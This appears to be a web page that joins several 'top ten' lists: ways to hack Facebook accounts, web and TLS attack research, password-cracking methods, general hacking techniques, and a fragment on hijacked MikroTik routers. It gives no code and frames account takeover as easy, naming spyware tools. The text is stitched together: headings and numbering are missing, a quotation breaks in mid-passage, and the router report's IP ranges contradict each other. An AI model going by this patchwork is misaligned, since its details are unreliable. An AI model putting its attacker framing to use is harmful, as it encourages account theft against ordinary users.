HackTech News -
Top ten Hacking technique
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.
Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.
Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.
4. Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.
5. Sidejacking With Firesheep
Sidejacking attack went common in late 2010, however it's still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.
6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying software's used to monitor a Cellphone. The most popular Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold.
7. DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.
8. USB Hacking
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.
9. Man In the Middle Attacks
If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.
Botnets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.
Top 10 Web hacking techniques -
FREAK (Factoring Attack on RSA-Export Keys)
The FREAK (“Factoring RSA Export Keys”) ATTACK is a security threat that was discovered as a result of SSL/TLS vulnerability on March 3, 2015. In such attacks, an attacker intercepts the HTTPS connections between vulnerable client and servers forcing him to use susceptible servers with weakened encryptions. Such encryptions can be easily broken to manipulate web servers and access sensitive data.
The FREAK attack was discovered by Karthikeyan Bhargavan at INRIA in Paris and the miTLS team and announced by Matthew Green.
A kind of man-in-the-middle-attack i.e. MITM in which an attacker surreptitiously relays on the connection and alters the information between the partners who believe that they are communicating directly.
In LogJam attack, an attacker secretly downgrades vulnerable TLS connections to 512-bit export-grade cryptography. This allows him to easily read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. Any server that supports DHE_EXPORT ciphers and all the latest web browsers are easily applicable to be affected by such attacks.
3. Web Timing Attacks Made Practical
Web Timing attacks have been revealed many years back but this is the first time that researchers showed how it can be executed. A Web Timing Attack is a side channel attack in which the hacker attempts to settle a cryptosystem by analyzing the time taken to execute cryptographic algorithms. Every logical operation takes some time to get executed, which can differ based on the input. With precise measurements of the time for each operation, an attacker can work backward to the input.
Black Hat talk on how to tweak timing side-channel attacks to make it easier to perform remote timing attacks against modern web apps.
The lead researchers of web timing attack are Timothy Morgan and Jason Morgan.
4. Evading All* WAF XSS Filters
All web-application firewalls are supposed to protect against attacks but they don’t protect as expected.
Cross-site scripting (XSS) is a web application vulnerability which enables an attacker to run his own scripts (client-side scripts) into web pages. In most of the cases, an input form is used by an attacker to inject his malicious code.
Security researcher Mazin Ahmed found that it is possible to evade cross-site scripting filters of all popular web application firewalls. Once exploited, an attacker can easily steal cookies, credentials and even spread malware by successfully exploiting an XSS vulnerability.
The research paper can be read here.
5. Abusing CDN’s with SSRF Flash and DNS
Nowadays almost all websites use content delivery networks (CDN) to speed up the performance of their websites as well as to server higher availability of content to end-users based on their geographical location. Now, this allows an attacker to penetrate CDN’s protection, steal visitors’ cookie with a modified JS file which will run in vulnerable’s website. Research highlighted at Black Hat describes that there is a collection of attack patterns that can be used against content delivery networks to target a wide range of high availability websites.
For more info, click here and know everything.
6. Illusory TLS
illusory TLS is an elliptic curve asymmetric backdoor in RSA key generation which can wreck the universal implicit cross-certification adopted in the current Web PKI to break all the HTTPS security guarantees. This attack pattern exploits the security assurances of X.509 PKI security architecture by employing CA certificates that include secretly embedded backdoor. It was discovered by a security researcher, Alfonso De Gregorio.
7. Exploiting XXE in File Parsing Functionality
Cyber criminals can exploit the XXE in file parsing functionality.
An XML External Entity attack or XXE Attack is a type of attack against an application that parses XML input. In this attack, an attacker can easily parse entity, when XML input containing a reference to an external entity is processed by a weakly configured XML parser. It may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
A Black Hat talk examines different methods in exploiting XML Entity vulnerabilities in file parsing/upload functionality for XML-supported file formats such as DOCX, XLSX, and PDF.
This vulnerability attack was discovered by the security researcher, Will Vandevanter.
8. Abusing XSLT for Practical Attacks
Security researcher Fernando Arnaboldi illustrated the different reasons of XSLT Attacks at the Black Hat conference for the first time. The vulnerability in XSLT was known for a long time. XSLT converts XML documents into other XML documents, or other formats such as HTML for web pages, plain text or XSL. It may lead to security issues like Denial of Service Attacks, Cross-Site Attacks etc. It can lead to threatening the integrity and confidentiality of user information.
WordPress: Another Avenue for Indirect Denial of Service
9. Magic Hashes
Security researchers, Robert Hansen and Jeremi M. Gosney have discovered a vulnerability due to delicacy in the way PHP handles hashed strings in certain instances which make it feasible to compromise authentication systems and other functions and leverages the unauthorized access by the attacker to steal sensitive or personal information.
You can get further information about magic hashes here.
10. Hunting Asynchronous Vulnerability
There are a number of asynchronous vulnerabilities which are not visible to a vulnerable client like error messages, async calls etc. Security researcher James Kettle presented a research at 44CON delves that demonstrated how to use exploit-induced callback methods to find such vulnerabilities hiding in backend functions and background threads.
Top ten password-cracking techniques -
1. Dictionary attack
The dictionary attack uses a simple file containing words that can be found in a dictionary, hence its rather straightforward name. In other words, this attack uses exactly the kind of words that many people use as their password.
Cleverly grouping words together such as "letmein" or "superadministratorguy" will not prevent your password from being cracked this way – well, not for more than a few extra seconds.
2. Brute force attack
Similar to the dictionary attack, the brute force attack comes with an added bonus for the hacker. Instead of simply using words, a brute force attack lets them detect non-dictionary words by working through all possible alpha-numeric combinations from aaa1 to zzz10.
It’s not quick, provided your password is over a handful of characters long, but it will uncover your password eventually. Brute force attacks can be shortened by throwing additional computing horsepower, in terms of both processing power – including harnessing the power of your video card GPU – and machine numbers, such as using distributed computing models like online bitcoin miners.
3. Rainbow table attack
Rainbow tables aren't as colourful as their name may imply but, for a hacker, your password could well be at the end of it. In the most straightforward way possible, you can boil a rainbow table down into a list of pre-computed hashes – the numerical value used when encrypting a password. This table contains hashes of all possible password combinations for any given hashing algorithm. Rainbow tables are attractive as it reduces the time needed to crack a password hash to simply just looking something up in a list.
However, rainbow tables are huge, unwieldy things. They require serious computing power to run and a table becomes useless if the hash it's trying to find has been "salted" by the addition of random characters to its password ahead of hashing the algorithm.
There is talk of salted rainbow tables existing, but these would be so large as to be difficult to use in practice. They would likely only work with a predefined "random character" set and password strings below 12 characters as the size of the table would be prohibitive to even state-level hackers otherwise.
There's an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked log in page associated with whatever service it is the hacker wants to access, requesting the user to put right some terrible problem with their security. That page then skims their password and the hacker can go use it for their own purpose.
Why bother going to the trouble of cracking the password when the user will happily give it you anyway?
5. Social engineering
Social engineering takes the whole "ask the user" concept outside of the inbox that phishing tends to stick with and into the real world.
A favourite of the social engineer is to call an office posing as an IT security tech guy and simply ask for the network access password. You’d be amazed at how often this works. Some even have the necessary gonads to don a suit and name badge before walking into a business to ask the receptionist the same question face to face.
A keylogger, or screen scraper, can be installed by malware which records everything you type or takes screenshots during a login process, and then forwards a copy of this file to hacker central.
Some malware will look for the existence of a web browser client password file and copy this which, unless properly encrypted, will contain easily accessible saved passwords from the user's browsing history.
7. Offline cracking
It’s easy to imagine that passwords are safe when the systems they protect lock out users after three or four wrong guesses, blocking automated guessing applications. Well, that would be true if it were not for the fact that most password hacking takes place offline, using a set of hashes in a password file that has been ‘obtained’ from a compromised system.
Often the target in question has been compromised via a hack on a third party, which then provides access to the system servers and those all-important user password hash files. The password cracker can then take as long as they need to try and crack the code without alerting the target system or individual user.
8. Shoulder surfing
The most confident of hackers will take the guise of a parcel courier, aircon service technician or anything else that gets them access to an office building.
Once they are in, the service personnel "uniform" provides a kind of free pass to wander around unhindered, and make note of passwords being entered by genuine members of staff. It also provides an excellent opportunity to eyeball all those post-it notes stuck to the front of LCD screens with logins scribbled upon them.
Savvy hackers have realised that many corporate passwords are made up of words that are connected to the business itself. Studying corporate literature, website sales material and even the websites of competitors and listed customers can provide the ammunition to build a custom word list to use in a brute force attack.
Really savvy hackers have automated the process and let a spidering application, similar to those employed by leading search engines to identify keywords, collect and collate the lists for them.
The password crackers best friend, of course, is the predictability of the user. Unless a truly random password has been created using software dedicated to the task, a user-generated ‘random’ password is unlikely to be anything of the sort.
Instead, thanks to our brains' emotional attachment to things we like, the chances are those random passwords are based upon our interests, hobbies, pets, family and so on. In fact, passwords tend to be based on all the things we like to chat about on social networks and even include in our profiles. Password crackers are very likely to look at this information and make a few - often correct - educated guesses when attempting to crack a consumer-level password without resorting to dictionary or brute force attacks.
1. Bait and Switch
Using bait and switch hacking technique, an attacker can buy advertising spaces on the websites. Later, when a user clicks on the ad, he might get directed to a page that’s infected with malware. This way, they can further install malware or adware on your computer. The ads and download links shown in this technique are very attractive and users are expected to end up clicking on the same.
The hacker can run a malicious program which the user believes to be authentic. This way, after installing the malicious program on your computer, the hacker gets unprivileged access to your computer.
2. Cookie Theft
The cookies of a browser keep our personal data such as browsing history, username, and passwords for different sites that we access. Once the hacker gets the access to your cookie, he can even authenticate himself as you on a browser. A popular method to carry out this attack is to encourage a user’s IP packets to pass through attacker’s machine.
Also known as SideJacking or Session Hijacking, this attack is easy to carry out if the user is not using SSL (https) for the complete session. On the websites where you enter your password and banking details, it’s of utmost importance for them to make their connections encrypted.
3. ClickJacking Attacks
ClickJacking is also known by a different name, UI Redress. In this attack, the hacker hides the actual UI where the victim is supposed to click. This behaviour is very common in app download, movie streaming, and torrent websites. While they mostly employ this technique to earn advertising dollars, others can use it to steal your personal information.
In another word, in this type of hacking, the attacker hijacks the clicks of the victim that aren’t meant for the exact page, but for a page where the hacker wants you to be. It works by fooling an internet user into performing an undesired action by clicking on hidden link.
4. Virus,Trojan etc
Virus or trojans are malicious software programs which get installed into the victim’s system and keeps sending the victims data to the hacker. They can also lock your files, serve fraud advertisement, divert traffic, sniff your data, or spread on all the computer connected to your network.
Phishing is a hacking technique using which a hacker replicates the most-accessed sites and traps the victim by sending that spoofed link. Combined with social engineering, it becomes one of the most commonly used and deadliest attack vectors.
Once the victim tries to login or enters some data, the hacker gets that private information of the target victim using the trojan running on the fake site. Phishing via iCloud and Gmail account was the attack route taken by hackers who targeted the “Fappening” leak, which involved numerous Hollywood female celebrities.
CoinHive Mining Code Injection -
Once enabled the Mikrotik RouterOS HTTP proxy, the attackers hijack the HTTP proxy requests to a local HTTP 403 error page which injects a link for web mining code from Coinhive. Anyway the mining code used in this way cannot work because all the external web resources, including coinhive.com ones, are blocked by the proxy ACLs set by attackers themselves.”
Maliciously Enabling Sock4 Proxy -
The attackers enabled the Socks4 port or TCP/4153 on victims device, in this way the attacker gain persistence on the router even after it has been rebooted (IP change) by periodically reporting its latest IP address to the attacker’s URL. “a total of 239K IPs are confirmed to have Socks4 proxy enabled maliciously. The Socks4 port is mostly TCP/4153, and very interestingly, the Socks4 proxy config only allows access from one single net-block 22.214.171.124/25.” states the report “In order for the attacker to gain control even after device reboot(ip change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker’s URL.” Experts pointed out that all the 239,000 IP addresses only allow access from 126.96.36.199/25, actually mainly from the 188.8.131.52 address.
The MikroTik RouterOS devices to capture packets on the router and forward them to the specified Stream server, this feature could be abused by attackers to forward the traffic to IP addresses controlled by them. Experts noticed that a significant number of devices have their traffic going to the 184.108.40.206 IP.